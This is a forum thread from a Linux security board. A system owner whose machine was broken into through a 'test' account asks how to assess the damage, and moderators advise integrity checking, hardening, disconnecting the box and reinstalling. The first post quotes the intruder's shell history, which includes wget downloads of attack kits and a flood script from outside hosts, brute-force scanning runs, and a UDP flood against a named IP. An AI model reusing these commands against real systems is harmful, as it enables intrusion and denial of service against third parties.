LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 09-27-2005, 09:43 AM   #1
thew00t
LQ Newbie
 
Registered: Feb 2004
Distribution: Slackware 9.1 and BSD 5.2
Posts: 28

Rep: Reputation: 16
Brute-force attack - How can I assess the damage?


This morning I came in to work to find my FC3 box being brute force attacked. I ran top when I noticed some major lag in performance and found about 50 processes by the name of "brute." I killed all of them and ran a "who" command, which told me someone had logged in using the account "test" on pts9. Killed the terminal's process and checked out /home/test. ls -al didn't reveal much more than
Code:
total 48
drwx------  4 test test 4096 Sep 25 14:51 .
drwxr-xr-x  5 root root 4096 Sep 19 18:48 ..
-rw-------  1 test test 1137 Sep 27 10:30 .bash_history
-rw-r--r--  1 test test   24 Sep 16 10:35 .bash_logout
-rw-r--r--  1 test test  191 Sep 16 10:35 .bash_profile
-rw-r--r--  1 test test  124 Sep 16 10:35 .bashrc
-rw-r--r--  1 test test  383 Sep 16 10:35 .emacs
-rw-r--r--  1 test test  120 Sep 16 10:35 .gtkrc
drwxr-xr-x  3 test test 4096 Sep 16 10:35 .kde
drwxr-xr-x  2 test test 4096 Sep 16 10:35 .xemacs
-rw-r--r--  1 test test  658 Sep 16 10:35 .zshrc
It says total 48 but thats obviously not 48 files. I checked the contents of .bash_history (way to not cover the trail!) and got this:
Code:
[root@dwong5 test]# cat .bash_history
uname -a
uptime
users
passwd
wget
ls
ls -a
cd /var/tmp
ls
ls -a
/sbin/ifconfig | grep inet
ls
who
wget caracal.idilis.ro/psyLINUX.tar.gz
tar zxvf psyLINUX.tar.gz
rm -rf psyLINUX.tar.gz
cd psybnc/
./psyport 6669
ps aux
./psybnc
cd ..
wget caracal.idilis.ro/scan.tgz
tar zxvf scan.tgz
rm -rf scan.tgz
cd scan/
chmod +w vuln.txt
ls
./start
./start 211.234
./start 66.52
uptime
cd ..
ls
uname -a
exit
ls -a
cd /var/tmp/scan/
ls
cat vuln.txt
ps aux
./start 213.236
uptime
cd /var/tmp
ls
cd scan/
;s
ls
chmod +x vuln.txt
cat vuln.txt
./start 152.252
./start 193.215
./start 70.98
./start 172.148
./start 172.14
ps aux
./start 198.32
./start 4.38
cat vuln.txt
cat /etc/issue
cat /proc/cpuinfo
ls
ps aux
ls
./start 171.152
./start 217.254
./start 69.21
./start 69.201
./start 217.206
./start 132.249
cd /var/tmp
ls
cd scan/
./start 213.236
cat vuln.txt
./start 217.239
cd ..
ls
wget
wget www.moused.as.ro/udp.pl
chmod +x udp.pl
ls
./udp.pl 69.16.192.39 22 0
ps aux
rm -rf udp.pl
cd scan/
killall -9 brute
ps aux
./start 69.39
ps aux
cat vuln.txt
./start 65.104
uname -a
cd /var/tmp/scan/
ls
cat vuln.txt
uptime
who
ps aux
exit
What I would like to know:
1) Is there any way to find the extent of the damage, if any?
2) How can I prevent this again?

Thanks!
 
Old 09-27-2005, 10:21 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,485
Blog Entries: 54

Rep: Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902
1) Is there any way to find the extent of the damage, if any?
Local integrity check using Aide or Samhain or alike. If you're haven't got any of those, using a package manager with verification option: at least to some extent the possibility of checking binaries and config files. Otherwise: none but diffing against backups, practically speaking.


2) How can I prevent this again?
Only allow what you know is needed in terms of (LAN or publicly accessable) (secure or chrooted) networked services, user accounts and please have a look at the LQ security refs: http://www.linuxquestions.org/questi...threadid=45261 for hardening the box. One example: if you where running a kernel with Grsecurity patches, she wouldn't even be *able* to open an outbound socket unless you specifically allowed that account to have that privilege.
 
Old 09-27-2005, 02:21 PM   #3
TigerOC
Senior Member
 
Registered: Jan 2003
Location: Devon, UK
Distribution: Debian Etc/kernel 2.6.18-4K7
Posts: 2,380

Rep: Reputation: 49
I found this quite ironic really. Amongst the trail, is the link - http://www.moused.as.ro/udp.pl and the perl script and then when you go the index page it is all about securing your server. Just had to smile - sorry. I feel for you but what possessed you to have a user named test with these permissions? Really an accident waiting to happen.
if you download and have a look at the file scan.tgz he was using your system to scan other systems in the ip ranges of the various scripts contained in the package along with all the possible names of users and passwords. A very interesting insight into the mind of a cracker and what they can do.
Your answer is really recover any data and then if=/dev/zero of=/dev/hdx bs=1M and re-install.

Last edited by TigerOC; 09-27-2005 at 02:51 PM.
 
Old 09-27-2005, 03:11 PM   #4
thew00t
LQ Newbie
 
Registered: Feb 2004
Distribution: Slackware 9.1 and BSD 5.2
Posts: 28

Original Poster
Rep: Reputation: 16
Thanks for the replies. I know the "test" user looks quite like a rookie admin mistake, and probably is, but I have no recall of ever setting up a user like that, nor would I with such a pressumably weak password. This makes me wonder how the account came in to creation. Well, it looks as though nothing was compromised. Diff'ing against backups isn't much of an option as I don't keep regular backups of my work machine though I probably should. And yeah, I'm gonna stay clear of the dd'ing my hard disk to zero for the moment
 
Old 09-27-2005, 06:08 PM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,485
Blog Entries: 54

Rep: Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902Reputation: 2902
looks quite like a rookie admin mistake, and probably is, but I have no recall of ever setting up a user like that, nor would I with such a pressumably weak password. This makes me wonder how the account came in to creation.
One of the reasons root account users should keep a logfile, appropriately harden boxen and regularly inspected them for changes (Get Aide or Samhain plus Tiger or LSAT plus Chkrootkit and/or Rkhunter). OTOH there still is SW that installs crappy default login:pass combo's, an audit would have caught that. Tiger for instance can inspect the password files and run JTR, and Rkhunter does inspect the password files as well.


Well, it looks as though nothing was compromised.
Meaning you decided the actual state of the box using what? Without proper means of determining that's worth close to nothing.


And yeah, I'm gonna stay clear of the dd'ing my hard disk to zero for the moment
In any case compromised boxen shouldn't stay connected to the 'net until you find the cause or wiped it clear and reinstalled the whole setup (TigerOC is right about that) as it does not only affect your situation but possibly others as well if a compromised box is being allowed to be used as intermediate.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
How did the NASA get hacked, was it just a brute force attack? abefroman Linux - Security 2 05-18-2005 05:33 AM
SSH brute force.... compromised? heri0n Linux - Security 15 11-21-2004 05:51 PM
Nessus Brute Force Gerardoj Linux - General 0 12-27-2003 04:07 PM
Brute force DHCP SSBN Linux - Networking 10 10-21-2003 10:34 AM
Brute Force kwigibo Linux - General 2 08-01-2002 12:42 AM


All times are GMT -5. The time now is 02:16 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration